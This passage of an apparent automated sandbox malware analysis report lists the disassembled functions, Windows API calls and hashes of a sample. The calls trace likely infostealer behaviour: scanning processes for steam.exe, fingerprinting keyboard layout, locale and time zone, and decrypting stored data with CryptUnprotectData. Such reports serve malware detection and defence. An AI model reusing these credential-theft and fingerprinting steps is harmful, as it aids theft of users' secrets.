                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Buu$Tt:{$a"aZ$q|]U$?o$D>}$]=$m{$]
                              • API String ID: 0-1268567615
                              • Opcode ID: 856b03ada0cd90a315cc298685a696a879fd469b8e6db539013337118a1c8547
                              • Instruction ID: 3941f02b4b9600b532b53ea8e6fc4a465495a50271d2c685963826eee0ef81ae
                              • Opcode Fuzzy Hash: 856b03ada0cd90a315cc298685a696a879fd469b8e6db539013337118a1c8547
                              • Instruction Fuzzy Hash: 5DB22AF360C2049FE3046E2DEC8567AFBE9EBD4720F16463DEAC5C3744EA3558058696
                              Function 009485A2 Relevance: 12.9, Strings: 9, Instructions: 1626COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: >.w$FDi$\]Z$c&#p$e}uv$t\$x;k5$[Q$[Q
                              • API String ID: 0-3298746570
                              • Opcode ID: d9ef96fb744abed5f9d0323d1f9c80b499d37c88b255becbeb7da8b73cc8e9e9
                              • Instruction ID: 47e3ad24069e2d972808f6fa9904f899a6ec60c5531b049d47697799a27d0627
                              • Opcode Fuzzy Hash: d9ef96fb744abed5f9d0323d1f9c80b499d37c88b255becbeb7da8b73cc8e9e9
                              • Instruction Fuzzy Hash: A2B22AF360C2049FE304AE2DEC8567AB7E9EF94720F1A853DE6C4C7744EA3598058697
                              Function 005B4630 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 005B4648
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B4658
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B466A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 005B4680
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B4692
                              • CloseHandle.KERNEL32(00000000), ref: 005B469D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              • Opcode ID: c609476f33e36365390c8553250919d7c8dc9cf9c441cc6d3ac4c98f5a3028c7
                              • Instruction ID: d99d0778fe047c15eecc5d6f5bd15baa82e080695c6aa7b29d6075fa33e23560
                              • Opcode Fuzzy Hash: c609476f33e36365390c8553250919d7c8dc9cf9c441cc6d3ac4c98f5a3028c7
                              • Instruction Fuzzy Hash: BC01A2316011285BD7609F609C4DFEA7BBCFF09310F0441D9E908D1040EF78E9948EA9
                              Function 005B2D00 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 005B2D3B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 005B2D4D
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 005B2D5A
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 005B2D8C
                              • LocalFree.KERNEL32(00000000), ref: 005B2F6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 91e4c9b76d185adbf23e28ac3003dd0d4477439124ffb03453e18082fb9a7abf
                              • Instruction ID: 1f73c784598a5e80904cef730cc26d93776e871792e2fe7a7bd90adf48075445
                              • Opcode Fuzzy Hash: 91e4c9b76d185adbf23e28ac3003dd0d4477439124ffb03453e18082fb9a7abf
                              • Instruction Fuzzy Hash: 98B10971900205CFC755CF19C949BA5BBF5BB48325F29C1ADE4099B2A2D776EC82CFA0
                              Function 00954073 Relevance: 10.4, Strings: 7, Instructions: 1619COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %>vA$@0}$D&;o$N0y?$R,M=$SK7$\N
                              • API String ID: 0-2710613983
                              • Opcode ID: b49f1120939781047f8034012e769af1f04189e1e04146f5c629b366276a56f4
                              • Instruction ID: 5456a21e82b778e0aaef823899cd881e967deccc92fe48998c777a4bb50ec14a
                              • Opcode Fuzzy Hash: b49f1120939781047f8034012e769af1f04189e1e04146f5c629b366276a56f4
                              • Instruction Fuzzy Hash: 3AB2E6B390C2149FE304AE29EC8567AFBE5EF94720F1A493DEAC5C3740EA3558058797
                              Function 00943526 Relevance: 9.1, Strings: 6, Instructions: 1605COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: cc~$c~u$c~u${W'f$~1ko$m[~
                              • API String ID: 0-651459261
                              • Opcode ID: 064ed71719ceaa822bf23eaeb5defd79d3cf9170bf258224d1fd85701d1e8a96
                              • Instruction ID: 020f1e734be3e3478e1efe4007a336c96a175f1a3ccc2042a52fdb66faf95237
                              • Opcode Fuzzy Hash: 064ed71719ceaa822bf23eaeb5defd79d3cf9170bf258224d1fd85701d1e8a96
                              • Instruction Fuzzy Hash: 5FB206F3A0C2049FE3146E2DEC8577ABBE9EF94720F16493DEAC4C3744EA3558418696
                              Function 00946B36 Relevance: 9.1, Strings: 6, Instructions: 1564COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 3=$8F#&$pXml$v*m5$&o6$8{
                              • API String ID: 0-4209079957
                              • Opcode ID: 80eb7a44f4a192c8b7832dbbf43d3266e712ae6518b5dca3aecc82748437c111
                              • Instruction ID: de09d35e72d4e245494528cfd0dabbb33903a467182d4379d3de6e5a87246c30
                              • Opcode Fuzzy Hash: 80eb7a44f4a192c8b7832dbbf43d3266e712ae6518b5dca3aecc82748437c111
                              • Instruction Fuzzy Hash: D5B2E3F350C2049FE3046E2DEC8567AFBE9EF94620F1A493DEAC4C3744EA7598058697
                              Function 005B2BB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 005B2BE2
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B2BE9
                              • GetTimeZoneInformation.KERNEL32(?), ref: 005B2BF8
                              • wsprintfA.USER32 ref: 005B2C23
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID: wwww
                              • API String ID: 3317088062-671953474
                              • Opcode ID: af8959825ac9d189824aff2b6eabfa434765368b747a9f201f5877c20037b828
                              • Instruction ID: b1a40b89a82926b65beddb844c82d271b77f9fd92b5ad48ed926548bd9fc3ef5
                              • Opcode Fuzzy Hash: af8959825ac9d189824aff2b6eabfa434765368b747a9f201f5877c20037b828
                              • Instruction Fuzzy Hash: F601F771A00604ABC7189F68DC4EFAABB69E784720F00836DF916D72C0D77429408AE9
                              Function 0094A03E Relevance: 7.9, Strings: 5, Instructions: 1630COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =C}F$G_=_$g~}k$nrNz$v|?
                              • API String ID: 0-2657977514
                              • Opcode ID: 1980bad36e201c9e41e4783b9645be6e24194219552c63972c959887141d20de
                              • Instruction ID: cfd4684cc98823ff4c35b6f69617b8c019a809a711ad8f55ff82a82a8ad3c990
                              • Opcode Fuzzy Hash: 1980bad36e201c9e41e4783b9645be6e24194219552c63972c959887141d20de
                              • Instruction Fuzzy Hash: BEB2D5F360C2009FE3046E29EC8567AFBE9EF94720F1A493DEAC5C7744EA3558058697
                              Function 0094BBC9 Relevance: 7.8, Strings: 5, Instructions: 1592COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ;mw$>R!o$?-$yPW$;w
                              • API String ID: 0-2594508399
                              • Opcode ID: 3a09372e5ba6ccb954e8acffa366ab5858110436210a9557f5e2c1e60139d2ea
                              • Instruction ID: 84484efe903826f20d9434b921cb1ae0bd38eca2275517fc4204ae4f498d2e01
                              • Opcode Fuzzy Hash: 3a09372e5ba6ccb954e8acffa366ab5858110436210a9557f5e2c1e60139d2ea
                              • Instruction Fuzzy Hash: 62B2B4F360C6109FE704AF29EC8567ABBE5EF94720F16893DEAC583344E63558018B97
                              Function 00597690 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0059769E
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005976A5
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 005976CD
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005976ED
                              • LocalFree.KERNEL32(?), ref: 005976F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: e3e6976fe24fdf2f723dab7f80f38edf075e4dbd87c74a2f983bc6a6c8b1baba
                              • Instruction ID: 9603210a8680354339d487fe2941cc2a97d543fdf9cac71e9be082da02012c7d
                              • Opcode Fuzzy Hash: e3e6976fe24fdf2f723dab7f80f38edf075e4dbd87c74a2f983bc6a6c8b1baba
                              • Instruction Fuzzy Hash: 3C011275B40309BBEB50DB949C4AFAA7B78FB44B11F108159FB05EB2C0D6B4A9408794
                              Function 005B39F0 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 005B7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 005B722E
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005B3A36
                              • Process32First.KERNEL32(00000000,00000128), ref: 005B3A49
                              • Process32Next.KERNEL32(00000000,00000128), ref: 005B3A5F
                                • Part of subcall function 005B7340: lstrlen.KERNEL32(------,00595B1B), ref: 005B734B
                                • Part of subcall function 005B7340: lstrcpy.KERNEL32(00000000), ref: 005B736F
                                • Part of subcall function 005B7340: lstrcat.KERNEL32(?,------), ref: 005B7379
